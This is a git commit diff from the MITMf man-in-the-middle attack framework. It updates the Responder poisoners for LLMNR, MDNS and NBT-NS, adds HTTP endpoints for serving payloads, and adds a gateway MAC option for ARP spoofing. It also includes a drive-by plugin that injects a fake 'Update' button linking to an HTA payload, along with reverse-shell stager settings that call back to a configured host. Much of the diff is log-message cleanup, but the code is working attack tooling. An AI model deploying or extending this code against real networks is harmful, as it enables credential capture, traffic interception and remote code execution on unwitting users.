responder code is now up to date with the lastest version

logging is going to have to get cleaned up, but that's a minor issue re-implemented the function to add endpoints to the http server added an option to manually specify the gateways mac in the Spoofer plugin
2025-07-06 13:02:24 -07:00 · 2015-08-05 13:31:04 +02:00 · 2015-08-05 13:31:04 +02:00 · 772ef9ab39
commit 772ef9ab39
parent c527dc1d21
12 changed files with 375 additions and 332 deletions
--- a/config/mitmf.conf
+++ b/config/mitmf.conf
@ -446,8 +446,8 @@
 			[[[[WindowsIntelx86]]]]
 				PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
 				# PATCH_METHOD overwrites PATCH_TYPE with jump
-				PATCH_METHOD = automatic
-				HOST = 192.168.1.88
+				PATCH_METHOD = 
+				HOST = 10.9.135.193
 				PORT = 8444
 				SHELL = iat_reverse_tcp_stager_threaded
 				SUPPLIED_SHELLCODE = None
@ -458,8 +458,8 @@
 			[[[[WindowsIntelx64]]]]
 				PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
 				# PATCH_METHOD overwrites PATCH_TYPE with jump
-				PATCH_METHOD = automatic
-				HOST = 192.168.1.16
+				PATCH_METHOD = 
+				HOST = 10.9.135.193
 				PORT = 8088
 				SHELL = iat_reverse_tcp_stager_threaded
 				SUPPLIED_SHELLCODE = None
--- a/core/html/htadriveby.html
+++ b/core/html/htadriveby.html
@ -54,7 +54,7 @@ newHTML.innerHTML = '        \
  <ul>   \
       \
    <li>   \
-      <a target="_blank" href="http://_IP_GOES_HERE_/Flash.hta">   \
+      <a target="_blank" href="http://_IP_GOES_HERE_/_PAYLOAD_GOES_HERE_">   \
        <button type="button" style="font-size: 100%; margin-top: 5px; padding: 2px 5px 2px 5px; color: black;">   \
          Update   \
        </button>   \
--- a/core/poisoners/ARP.py
+++ b/core/poisoners/ARP.py
@ -38,8 +38,10 @@ class ARPpoisoner:
        except AddrFormatError as e:
            sys.exit("Specified an invalid IP address as gateway")

+        self.gatewaymac = options.gatewaymac
+        if options.gatewaymac is None:
            self.gatewaymac = getmacbyip(options.gateway)
-        if self.gatewaymac is None: sys.exit("Error: Could not resolve gateway's MAC address")
+            if not self.gatewaymac: sys.exit("Error: could not resolve Gateway's mac address")

        self.ignore     = self.get_range(options.ignore)
        if self.ignore is None: self.ignore = []
--- a/core/poisoners/LLMNR.py
+++ b/core/poisoners/LLMNR.py
@ -80,7 +80,6 @@ def IsICMPRedirectPlausible(IP):
        if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False:
            settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] You can ICMP Redirect on this network.")
            settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x))
-            settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.")
        else:
            pass

@ -107,14 +106,14 @@ class LLMNRServer(BaseRequestHandler):

            # Analyze Mode
            if settings.Config.AnalyzeMode:
-                settings.Config.AnalyzeLogger.warning("[Analyze mode: LLMNR]{} Request by {} for {}, ignoring".format(self.client_address[0], Name))
+                settings.Config.AnalyzeLogger.warning("{} [Analyze mode: LLMNR] Request for {}, ignoring".format(self.client_address[0], Name))

            # Poisoning Mode
            else:
                Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
                Buffer.calculate()
                soc.sendto(str(Buffer), self.client_address)
-                settings.Config.PoisonersLogger.warning("[LLMNR] Poisoned answer sent to {} for name {}".format(self.client_address[0], Name))
+                settings.Config.PoisonersLogger.warning("{} [LLMNR] Poisoned request for name {}".format(self.client_address[0], Name))

            if Finger is not None:
                settings.Config.ResponderLogger.info("[FINGER] OS Version: {}".format(Finger[0]))
--- a/core/poisoners/MDNS.py
+++ b/core/poisoners/MDNS.py
@ -87,7 +87,7 @@ class MDNSServer(BaseRequestHandler):
 			# Analyze Mode
 			if settings.Config.AnalyzeMode:
 				if Parse_IPV6_Addr(data):
-					settings.Config.AnalyzeLogger.warning('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (self.client_address[0], Request_Name))
+					settings.Config.AnalyzeLogger.warning('{} [Analyze mode: MDNS] Request for {}, ignoring'.format(self.client_address[0], Request_Name))

 			# Poisoning Mode
 			else:
@ -98,7 +98,7 @@ class MDNSServer(BaseRequestHandler):
 					Buffer.calculate()
 					soc.sendto(str(Buffer), (MADDR, MPORT))
 					
-					settings.Config.PoisonersLogger.warning('[MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name))
+					settings.Config.PoisonersLogger.warning('{} [MDNS] Poisoned answer for name {}'.format(self.client_address[0], Request_Name))

 		except Exception:
 			raise
--- a/core/poisoners/NBTNS.py
+++ b/core/poisoners/NBTNS.py
@ -86,7 +86,7 @@ class NBTNSServer(BaseRequestHandler):

 			# Analyze Mode
 			if settings.Config.AnalyzeMode:
-				settings.Config.AnalyzeLogger.warning("[Analyze mode: NBT-NS] Request by %s for %s, ignoring" % (self.client_address[0], Name))
+				settings.Config.AnalyzeLogger.warning("{} [Analyze mode: NBT-NS] Request for {}, ignoring".format(self.client_address[0], Name))

 			# Poisoning Mode
 			else:
@ -94,8 +94,8 @@ class NBTNSServer(BaseRequestHandler):
 				Buffer.calculate(data)
 				socket.sendto(str(Buffer), self.client_address)

-				settings.Config.PoisonersLogger.warning("[NBT-NS] Poisoned answer sent to %s for name %s (service: %s)" % (self.client_address[0], Name, NBT_NS_Role(data[43:46])))
+				settings.Config.PoisonersLogger.warning("{} [NBT-NS] Poisoned answer for name {} (service: {})" .format(self.client_address[0], Name, NBT_NS_Role(data[43:46])))

 			if Finger is not None:
-				settings.Config.ResponderLogger.info("[FINGER] OS Version     : %s" % Finger[0])
-				settings.Config.ResponderLogger.info("[FINGER] Client Version : %s" % Finger[1])
+				settings.Config.ResponderLogger.info("[FINGER] OS Version     : {}".format(Finger[0]))
+				settings.Config.ResponderLogger.info("[FINGER] Client Version : {}".format(Finger[1]))
--- a/core/servers/HTTP.py
+++ b/core/servers/HTTP.py
@ -34,6 +34,20 @@ log = logger().setup_logger("HTTP", formatter)

 class HTTP:

+	static_endpoints = {}
+	endpoints = {}
+
+	@staticmethod
+	def add_endpoint(url, content_type, payload):
+		Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type), Payload=payload)
+		Buffer.calculate()
+		HTTP.endpoints['/' + url] = Buffer
+
+	@staticmethod
+	def add_static_endpoint(url, content_type, path):
+		Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type))
+		HTTP.static_endpoints['/' + url] = {'buffer': Buffer, 'path': path}
+
 	def start(self):
 		try:
 			if OsInterfaceIsSupported():
@ -41,7 +55,7 @@ class HTTP:
 			else:
 				server = ThreadingTCPServer(('', 80), HTTP1)

-			t = threading.Thread(name='SMB', target=server.serve_forever)
+			t = threading.Thread(name='HTTP', target=server.serve_forever)
 			t.setDaemon(True)
 			t.start()

@ -156,7 +170,7 @@ def RespondWithFile(client, filename, dlname=None):
 		Buffer = ServeHtmlFile(Payload = ServeFile(filename))

 	Buffer.calculate()
-	log.info("[HTTP] Sending file {} to {}".format(filename, client))
+	log.info("{} [HTTP] Sending file {}".format(filename, client))

 	return str(Buffer)

@ -166,12 +180,16 @@ def GrabURL(data, host):
 	POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data)

 	if GET:
-		log.info("[HTTP] GET request from: {} URL: {}".format(host, ''.join(GET)))
+		req = ''.join(GET).strip()
+		log.info("[HTTP] {} - - GET '{}'".format(host, req))
+		return req

 	if POST:
-		log.info("[HTTP] POST request from: {} URL: {}".format(host, ''.join(POST)))
+		req = ''.join(POST).strip()
+		log.info("[HTTP] {} - - POST '{}'".format(host, req))
 		if len(''.join(POSTDATA)) > 2:
 			log.info("[HTTP] POST Data: {}".format(''.join(POSTDATA).strip()))
+		return req

 # Handle HTTP packet sequence.
 def PacketSequence(data, client):
@ -209,7 +227,7 @@ def PacketSequence(data, client):
 			ParseHTTPHash(NTLM_Auth, client)

 			if settings.Config.Force_WPAD_Auth and WPAD_Custom:
-				log.info("[HTTP] WPAD (auth) file sent to %s" % client)
+				log.info("{} [HTTP] WPAD (auth) file sent".format(client))
 				return WPAD_Custom

 			else:
@ -234,7 +252,7 @@ def PacketSequence(data, client):

 		if settings.Config.Force_WPAD_Auth and WPAD_Custom:
 			if settings.Config.Verbose:
-				log.info("[HTTP] WPAD (auth) file sent to %s" % client)
+				log.info("{} [HTTP] Sent WPAD (auth) file" .format(client))
 			return WPAD_Custom

 		else:
@ -246,12 +264,12 @@ def PacketSequence(data, client):
 		if settings.Config.Basic == True:
 			Response = IIS_Basic_401_Ans()
 			if settings.Config.Verbose:
-				log.info("[HTTP] Sending BASIC authentication request to %s" % client)
+				log.info("{} [HTTP] Sending BASIC authentication request".format(client))

 		else:
 			Response = IIS_Auth_401_Ans()
 			if settings.Config.Verbose:
-				log.info("[HTTP] Sending NTLM authentication request to %s" % client)
+				log.info("{} [HTTP] Sending NTLM authentication request to".format(client))

 		return str(Response)

@ -263,13 +281,26 @@ class HTTP1(BaseRequestHandler):
 			while True:
 				self.request.settimeout(1)
 				data = self.request.recv(8092)
-				GrabURL(data, self.client_address[0])
+				req_url = GrabURL(data, self.client_address[0])
 				Buffer = WpadCustom(data, self.client_address[0])

 				if Buffer and settings.Config.Force_WPAD_Auth == False:
 					self.request.send(Buffer)
 					if settings.Config.Verbose:
-						log.info("[HTTP] WPAD (no auth) file sent to %s" % self.client_address[0])
+						log.info("{} [HTTP] Sent WPAD (no auth) file".format(self.client_address[0]))
+
+				if (req_url is not None) and (req_url.strip() in HTTP.endpoints):
+					resp = HTTP.endpoints[req_url.strip()]
+					self.request.send(str(resp))
+
+				if (req_url is not None) and (req_url.strip() in HTTP.static_endpoints):
+					path = HTTP.static_endpoints[req_url.strip()]['path']
+					Buffer = HTTP.static_endpoints[req_url.strip()]['buffer']
+					with open(path, 'r') as file:
+						Buffer.fields['Payload'] = file.read()
+
+					Buffer.calculate()
+					self.request.send(str(Buffer))

 				else:
 					Buffer = PacketSequence(data,self.client_address[0])
@ -294,7 +325,7 @@ class HTTPS(StreamRequestHandler):
 				if Buffer and settings.Config.Force_WPAD_Auth == False:
 					self.exchange.send(Buffer)
 					if settings.Config.Verbose:
-						log.info("[HTTPS] WPAD (no auth) file sent to %s" % self.client_address[0])
+						log.info("{} [HTTPS] Sent WPAD (no auth) file".format(self.client_address[0]))

 				else:
 					Buffer = PacketSequence(data,self.client_address[0])
--- a/core/servers/SMB.py
+++ b/core/servers/SMB.py
@ -77,7 +77,6 @@ def Parse_Nego_Dialect(data):
    packet = data
    try:
        Dialect = tuple([e.replace('\x00','') for e in data[40:].split('\x02')[:10]])
-		#print hex(Dialect)

        if Dialect[0] == "NT LM 0.12":
            return "\x00\x00"
@ -101,6 +100,16 @@ def Parse_Nego_Dialect(data):
            return "\x09\x00"
        if Dialect[10] == "NT LM 0.12":
            return "\x0a\x00"
+        if Dialect[11] == "NT LM 0.12":
+            return "\x0b\x00"
+        if Dialect[12] == "NT LM 0.12":
+            return "\x0c\x00"
+        if Dialect[13] == "NT LM 0.12":
+            return "\x0d\x00"
+        if Dialect[14] == "NT LM 0.12":
+            return "\x0e\x00"
+        if Dialect[15] == "NT LM 0.12":
+            return "\x0f\x00"
    except Exception:
        print 'Exception on Parse_Nego_Dialect! Packet hexdump:'
        print hexdump(packet)
@ -260,8 +269,8 @@ class SMB1(BaseRequestHandler):
                ##session request 139
                if data[0] == "\x81":
                    Buffer = "\x82\x00\x00\x00"
-					self.request.send(Buffer)
                    try:
+                        self.request.send(Buffer)
                        data = self.request.recv(1024)
                    except:
                        pass
--- a/plugins/htadriveby.py
+++ b/plugins/htadriveby.py
@ -30,24 +30,18 @@ class HTADriveBy(Inject, Plugin):
    def initialize(self, options):
        self.bar_text = options.text
        self.ip = options.ip
+        self.hta = options.hta_app.split('/')[-1]
        Inject.initialize(self, options)
        self.html_payload = self.get_payload()

        from core.servers.HTTP import HTTP
-        def hta_request(path):
-            if path == options.hta_app.split('/')[-1]:
-                with open(options.hta_app) as hta_file:
-                    resp = flask.Response(hta_file.read())
-
-                resp.headers['Content-Type'] = "application/hta"
-                return resp
-
-        HTTPserver().add_endpoint(hta_request)
+        HTTP.add_static_endpoint(self.hta, "application/hta", options.hta_app)

    def get_payload(self):
        with open("./core/html/htadriveby.html", 'r') as file:
            payload = re.sub("_TEXT_GOES_HERE_", self.bar_text, file.read())
            payload = re.sub("_IP_GOES_HERE_", self.ip, payload)
+            payload = re.sub("_PAYLOAD_GOES_HERE_", self.hta, payload)
        return payload

    def options(self, options):
--- a/plugins/responder.py
+++ b/plugins/responder.py
@ -44,30 +44,37 @@ class Responder(Plugin):

        if self.config["Responder"]["SQL"].lower() == "on":
            from core.servers.MSSQL import MSSQL
+            self.tree_info.append("MSSQL server [ON]")
            MSSQL().start()

        if self.config["Responder"]["Kerberos"].lower() == "on":
            from core.servers.Kerberos import Kerberos
+            self.tree_info.append("Kerberos server [ON]")
            Kerberos().start()

        if self.config["Responder"]["FTP"].lower() == "on":
            from core.servers.FTP import FTP
+            self.tree_info.append("FTP server [ON]")
            FTP().start()

        if self.config["Responder"]["POP"].lower() == "on":
            from core.servers.POP3 import POP3
+            self.tree_info.append("POP3 server [ON]")
            POP3().start()

        if self.config["Responder"]["SMTP"].lower() == "on":
            from core.servers.SMTP import SMTP
+            self.tree_info.append("SMTP server [ON]")
            SMTP().start()

        if self.config["Responder"]["IMAP"].lower() == "on":
            from core.servers.IMAP import IMAP
+            self.tree_info.append("IMAP server [ON]")
            IMAP().start()

        if self.config["Responder"]["LDAP"].lower() == "on":
            from core.servers.LDAP import LDAP
+            self.tree_info.append("LDAP server [ON]")
            LDAP().start()

    def reactor(self, strippingFactory):
--- a/plugins/spoof.py
+++ b/plugins/spoof.py
@ -93,6 +93,7 @@ class Spoof(Plugin):
        options.add_argument('--netmask', dest='netmask', type=str, default='255.255.255.0', help='The netmask of the network')
        options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
        options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
+        options.add_argument('--gatewaymac', dest='gatewaymac', help='Specify the gateway MAC [will auto resolve if ommited]')
        options.add_argument('--targets', dest='targets', help='Specify host/s to poison [if ommited will default to subnet]')
        options.add_argument('--ignore', dest='ignore', help='Specify host/s not to poison')
        options.add_argument('--arpmode',type=str, dest='arpmode', default='rep', choices=["rep", "req"], help=' ARP Spoofing mode: replies (rep) or requests (req) [default: rep]')